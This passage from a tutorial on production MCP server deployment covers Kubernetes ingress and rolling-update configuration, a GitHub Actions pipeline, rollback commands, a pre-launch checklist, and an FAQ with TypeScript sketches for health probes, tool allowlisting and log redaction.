  annotations:
    # cert-manager auto-managed TLS certificate
    cert-manager.io/cluster-issuer: "letsencrypt-prod"
    # Nginx-specific configuration
    nginx.ingress.kubernetes.io/proxy-read-timeout: "300"
    nginx.ingress.kubernetes.io/proxy-send-timeout: "300"
    nginx.ingress.kubernetes.io/proxy-body-size: "10m"
    # Rate limiting at the ingress layer
    nginx.ingress.kubernetes.io/limit-rps: "30"
    nginx.ingress.kubernetes.io/limit-connections: "20"
spec:
  ingressClassName: nginx                # Assumes the Nginx Ingress controller's class is named "nginx"
  tls:
    - hosts:
        - mcp-gateway.example.com
      secretName: mcp-gateway-tls-secret
  rules:
    - host: mcp-gateway.example.com
      http:
        paths:
          - path: /mcp
            pathType: Prefix
            backend:
              service:
                name: mcp-server
                port:
                  number: 3000
          - path: /health
            pathType: Exact
            backend:
              service:
                name: mcp-server
                port:
                  number: 3000

CI/CD pipeline (GitHub Actions)

On every push to main, automatically test, build the Docker image, and deploy to Kubernetes. Pull requests against main run the test stage only:

# .github/workflows/deploy.yml — MCP Server CI/CD pipeline
name: Deploy MCP Server

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]

env:
  REGISTRY: registry.example.com
  IMAGE_NAME: mcp-server

jobs:
  # === Stage 1: Test ===
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: "20"
          cache: "npm"
      - run: npm ci
      - run: npm run typecheck        # TypeScript type checking
      - run: npm run lint             # ESLint
      - run: npm test -- --coverage  # Unit tests + coverage
      - name: Security audit
        run: npm audit --audit-level=high

  # === Stage 2: Build and push image ===
  build:
    needs: test
    if: github.ref == 'refs/heads/main'  # Only build images on main branch
    runs-on: ubuntu-latest
    outputs:
      image_tag: ${{ steps.meta.outputs.version }}
    steps:
      - uses: actions/checkout@v4
      - name: Generate image tag
        id: meta
        run: |
          TAG=$(date +%Y%m%d-%H%M%S)-${GITHUB_SHA::7}
          echo "version=${TAG}" >> $GITHUB_OUTPUT
      - name: Build Docker image
        run: |
          docker build -t $REGISTRY/$IMAGE_NAME:${{ steps.meta.outputs.version }} \
                       -t $REGISTRY/$IMAGE_NAME:latest .
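      - name: Log in to registry
        uses: docker/login-action@v3
        with:
          registry: ${{ env.REGISTRY }}
          username: ${{ secrets.REGISTRY_USERNAME }}   # Assumed secret names; define them in the repo settings
          password: ${{ secrets.REGISTRY_PASSWORD }}
      - name: Push to registry
        run: |
          docker push $REGISTRY/$IMAGE_NAME:${{ steps.meta.outputs.version }}
          docker push $REGISTRY/$IMAGE_NAME:latest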

  # === Stage 3: Deploy to Kubernetes ===
  deploy:
    needs: build
    runs-on: ubuntu-latest
    environment: production
    steps:
      - uses: actions/checkout@v4
      - name: Set image tag in deployment
        run: |
          sed -i "s|image: .*mcp-server:.*|image: $REGISTRY/$IMAGE_NAME:${{ needs.build.outputs.image_tag }}|" \
            k8s/deployment.yaml
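      - name: Set cluster context
        uses: azure/k8s-set-context@v4
        with:
          method: kubeconfig
          kubeconfig: ${{ secrets.KUBE_CONFIG }}       # Assumed secret holding a kubeconfig for the target cluster
      - name: Deploy to Kubernetes
        uses: azure/k8s-deploy@v4
        with:
          namespace: mcp-production
          manifests: |
            k8s/deployment.yaml
            k8s/service.yaml
          images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ needs.build.outputs.image_tag }}
          strategy: basic                  # Plain apply; the rollout follows the RollingUpdate strategy defined in the Deployment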

Rolling update and rollback strategy

MCP Server rolling updates must account for graceful SSE connection draining:

# k8s/strategy.yaml — Rolling update strategy for MCP long-lived connections
spec:
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxSurge: 1           # At most 1 extra new Pod
      maxUnavailable: 0     # No service degradation during update

  template:
    spec:
      # Graceful Pod termination—give SSE connections 30s to finish current tool calls
      terminationGracePeriodSeconds: 45

      containers:
        - name: mcp-server
          lifecycle:
            preStop:
              exec:
                command:
                  - /bin/sh
                  - -c
                  - |
                    # 1. Mark Pod as "draining" so the server stops accepting new sessions
                    #    (has an effect only if the server process reads this file)
                    echo "draining" > /tmp/pod-status
                    # 2. Wait for existing SSE connections to complete (up to 30s)
                    sleep 30
                    # 3. Graceful shutdown
                    kill -TERM 1
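
The preStop hook above only writes a marker and sleeps; something in the server still has to act on the drain. The following is a minimal sketch of that server-side half, assuming a hypothetical in-memory PodState and a separate /ready path for the readiness probe (the Deployment above points both probes at /health). All names here are illustrative.

```typescript
// Sketch: probe responses and exit condition for a draining MCP Server (illustrative names).
interface PodState {
  draining: boolean;     // set to true once SIGTERM or the preStop marker is seen
  activeStreams: number; // open SSE connections still running tool calls
}

interface ProbeResult {
  status: number;
  body: { status: string; activeStreams: number };
}

// Liveness: the process is healthy even while draining, so Kubernetes must not restart it
function livenessProbe(state: PodState): ProbeResult {
  return { status: 200, body: { status: "alive", activeStreams: state.activeStreams } };
}

// Readiness: report not-ready while draining so no new traffic is sent here
function readinessProbe(state: PodState): ProbeResult {
  if (state.draining) {
    return { status: 503, body: { status: "draining", activeStreams: state.activeStreams } };
  }
  return { status: 200, body: { status: "ready", activeStreams: state.activeStreams } };
}

// Safe to exit once draining has begun and the last stream has closed
function canExit(state: PodState): boolean {
  return state.draining && state.activeStreams === 0;
}

// Wiring sketch (Express-style, not executed here):
//   const state: PodState = { draining: false, activeStreams: 0 };
//   process.on("SIGTERM", () => { state.draining = true; });
//   app.get("/health", (_req, res) => { const r = livenessProbe(state); res.status(r.status).json(r.body); });
//   app.get("/ready",  (_req, res) => { const r = readinessProbe(state); res.status(r.status).json(r.body); });
```

Splitting the two probes matters: if the liveness endpoint also returned 503 during a drain, Kubernetes could restart the container and cut the very connections the drain is meant to protect. Checking canExit() periodically lets the process leave before the grace period ends when all streams finish early.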

Rollback commands—one command to revert to the previous stable version when a new deployment goes wrong:

# View deployment history
kubectl rollout history deployment/mcp-server -n mcp-production

# Rollback to the previous version
kubectl rollout undo deployment/mcp-server -n mcp-production

# Rollback to a specific revision
kubectl rollout undo deployment/mcp-server -n mcp-production --to-revision=3

# Monitor rollback status
kubectl rollout status deployment/mcp-server -n mcp-production

Kubernetes Deployments retain the last 10 ReplicaSets by default (configurable via revisionHistoryLimit). Each rolling update creates a new ReplicaSet. Rolling back is simply switching to a previous ReplicaSet—fast, reliable, one command.

Pre-launch deployment checklist

Before you hit "deploy," verify every item on this checklist:

✓ Check Item Verification Method
☐ All secrets migrated to K8s Secrets / Vault kubectl get secrets -n mcp-production
☐ TLS certificates configured with cert-manager auto-renewal kubectl get certificates -n mcp-production
☐ Health check endpoint returns healthy curl -s https://mcp-gateway.example.com/health | jq .status
☐ Prometheus metrics endpoint is scrapeable curl -s http://mcp-server:9090/metrics | head
☐ Auth middleware rejects tokenless requests (returns 401) curl -s -o /dev/null -w "%{http_code}" https://mcp-gateway.example.com/mcp
☐ Rate-limit middleware triggers 429 with Retry-After header Load test tool (e.g., k6) sending 100+ requests in a short window
☐ Docker sandbox properly isolated (network=none) docker ps -q --filter "name=mcp-sandbox" | xargs docker inspect | jq '.[].HostConfig.NetworkMode'
☐ Structured logs output valid JSON kubectl logs deployment/mcp-server -n mcp-production | head -1 | jq .
☐ Alerting rules configured and verified with a deliberately triggered test alert Check Alertmanager, Grafana Alerting, or PagerDuty dashboard
☐ At least one rolling update + rollback drill completed kubectl rollout undo + confirm zero service interruption

Once all boxes are checked, your MCP Server has the full production defense stack—from transport layer to application layer, from authentication to sandboxing, from monitoring to rollback.

Citable Definition: A Production-grade MCP Server is a complete security, isolation, and observability stack—built atop the MCP protocol core (Tools/Resources/Prompts) with transport hardening (TLS + Streamable HTTP), authentication & authorization (OAuth 2.1 + tool-level RBAC), sandbox isolation (Docker/gVisor containerized execution), gateway routing (Nginx multi-server aggregation), rate limiting (token bucket + tool weight quotas), and observability (OpenTelemetry tracing + Prometheus metrics + structured logging)—enabling a multi-tenant, multi-service, internet-facing enterprise AI Agent tool platform.

Next Steps

  • 📖 Foundational: Agent Tool Design Best Practices — Master the principles behind tool design before hardening your MCP Server.
  • 📖 Advanced: Building an Agent Framework from Scratch — Understand how LLMs interact with MCP Servers end-to-end.
  • 📖 Related: Multi-Agent Debate — Let AI Agents Challenge Each Other — How multiple agents collaborate and verify each other when sharing an MCP Server.

Frequently Asked Questions

Can I deploy an MCP Server to production without hardening?

Not recommended. The MCP reference implementation is designed for development: no built-in authentication, no sandboxing, no monitoring. Putting it directly into production carries at least these risks: unauthorized access (anyone who can reach the endpoint calls every tool), command injection (malicious commands in tool parameters get executed), and resource exhaustion (unbounded tool calls can take down the server). At minimum, complete the three P0 items from the Section 8 checklist before production: transport hardening (Streamable HTTP + TLS), OAuth 2.1 authentication with tool-level RBAC, and Docker sandbox isolation. Add basic monitoring (Prometheus + structured logging) as soon as possible after that.

stdio vs Streamable HTTP — which transport should I use?

It depends on your use case:

  • Use stdio: Only you need access (local Claude Desktop, IDE plugins), client and server on the same machine, no network auth or monitoring needed.
  • Use Streamable HTTP: Multiple users/apps need concurrent access, client and server on different machines (remote deployment), fine-grained auth and multi-tenant isolation required, ops capabilities needed (health checks, logging, metrics).

Simple rule: if it's just you, stdio is fine. If anyone else needs access, use Streamable HTTP + TLS.

Docker sandbox vs. gVisor — which should I start with?

Start with Docker. Upgrade only if you need it. Docker's namespace + cgroups isolation is sufficient for most production scenarios: it provides process, filesystem, network, and resource isolation, and virtually all CI/CD and orchestration systems support Docker natively. Its main limit is that containers share the host kernel.

Only consider gVisor when:

  • Serving multiple external customers (multi-tenant SaaS) needing stronger kernel-level isolation
  • Executing highly untrusted user code (user-uploaded scripts)
  • Financial, healthcare, or other compliance-required high-security environments

gVisor adds performance overhead (roughly 5-10% for many workloads, though syscall- and I/O-heavy tools can see more) and operational complexity (containerd + runsc runtime). Not worth it as the default.

How do I limit which tools an LLM can call to prevent abuse?

Three-layer control:

  1. Auth layer — Restrict available tools via OAuth scopes. Read-only users only see query_* and read_* prefixed tools.
  2. Gateway/App layer — Configure per-client per-minute call quotas at the Nginx/API gateway, plus concurrent tool execution limits.
  3. Server layer — Use tool allowlist environment variables to limit exposed tools. Even if 20 tools are registered, only allowlisted ones appear to the LLM. Pair with tool weight quotas to prevent heavy operations from starving resources.
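
Layers 1 and 3 both come down to filtering the tool list before it is returned to the client. The following is a minimal sketch under stated assumptions: the comma-separated allowlist format, the scope strings, and the names ToolDef, parseAllowlist, and visibleTools are all hypothetical, and an unset allowlist is treated as "expose nothing".

```typescript
// Sketch: filter registered tools by a server allowlist and the caller's scopes (illustrative names).
interface ToolDef {
  name: string;
  requiredScope: string; // hypothetical scope strings such as "tools:read"
}

// Parse a comma-separated allowlist, e.g. the value of an environment variable
function parseAllowlist(raw: string | undefined): Set<string> {
  return new Set(
    (raw ?? "")
      .split(",")
      .map((s) => s.trim())
      .filter((s) => s.length > 0),
  );
}

// A tool is visible only if the server allowlists it AND the caller holds its scope
function visibleTools(
  registered: ToolDef[],
  allowlistRaw: string | undefined,
  grantedScopes: string[],
): ToolDef[] {
  const allow = parseAllowlist(allowlistRaw);
  const scopes = new Set(grantedScopes);
  return registered.filter((t) => allow.has(t.name) && scopes.has(t.requiredScope));
}

const registeredTools: ToolDef[] = [
  { name: "query_metrics", requiredScope: "tools:read" },
  { name: "read_logs", requiredScope: "tools:read" },
  { name: "deploy_service", requiredScope: "tools:deploy" },
  { name: "delete_cluster", requiredScope: "tools:admin" },
];

// A read-only caller on a server that allowlists three of the four tools
const forReadOnlyUser = visibleTools(
  registeredTools,
  "query_metrics, read_logs, deploy_service",
  ["tools:read"],
).map((t) => t.name); // ["query_metrics", "read_logs"]
```

Failing closed when the allowlist is unset means a misconfigured deployment exposes no tools rather than all of them. The same check should run again at call time, since hiding a tool from the list does not stop a client from naming it directly.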

What should MCP Server logs contain, and how do I protect sensitive data?

Every tool invocation log should include:

  • Timestamp (ISO 8601 UTC), user/client ID
  • Tool name, parameters (sanitized—strip API keys, passwords, tokens)
  • Execution duration (ms), sandbox container ID, exit code
  • Rate-limit hit status, auth result (success/failure reason)

Never log:

  • Full JWT tokens, API keys, passwords
  • Personally Identifiable Information (PII)—email, phone, government IDs
  • Sensitive business data from tool responses (e.g., full database query results)

Use JSON-structured log output for aggregation in ELK/Loki/CloudWatch and filtering by field.
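
Parameter sanitization is easiest to get right when it happens in one place, just before the log line is serialized. The following is a minimal sketch of that step. The key pattern, the JWT-shaped regex, and the names sanitize, ToolCallLog, and toolCallLogLine are assumptions for illustration; it redacts by key name and token shape only and does not detect PII in free text.

```typescript
// Sketch: redact secrets from tool parameters before logging (illustrative names).
const SENSITIVE_KEY = /(pass(word)?|secret|token|api[_-]?key|authorization|cookie)/i;
// Three base64url segments starting with "eyJ", the usual shape of a JWT
const JWT_LIKE = /\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g;

function sanitize(value: unknown, depth: number = 0): unknown {
  if (depth > 5) return "[TRUNCATED]"; // guard against very deep or cyclic input
  if (typeof value === "string") return value.replace(JWT_LIKE, "[REDACTED_JWT]");
  if (Array.isArray(value)) return value.map((v) => sanitize(v, depth + 1));
  if (value !== null && typeof value === "object") {
    const source = value as Record<string, unknown>;
    const out: Record<string, unknown> = {};
    for (const key of Object.keys(source)) {
      // Redact the whole value when the key name looks sensitive
      out[key] = SENSITIVE_KEY.test(key) ? "[REDACTED]" : sanitize(source[key], depth + 1);
    }
    return out;
  }
  return value; // numbers, booleans, null, undefined pass through unchanged
}

interface ToolCallLog {
  userId: string;
  tool: string;
  params: unknown;
  durationMs: number;
  exitCode: number;
  rateLimited: boolean;
}

// Build one JSON log line with an ISO 8601 UTC timestamp and sanitized parameters
function toolCallLogLine(entry: ToolCallLog, now: Date = new Date()): string {
  return JSON.stringify({
    timestamp: now.toISOString(),
    ...entry,
    params: sanitize(entry.params),
  });
}
```

Redacting by key name catches the common cases (password, api_key, token) cheaply, and the JWT pattern catches bearer tokens that end up inside ordinary string fields. Tool responses are deliberately absent from ToolCallLog, in line with the rule against logging full query results.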

© 2026 xslyl.com — MCP Production Deployment Series
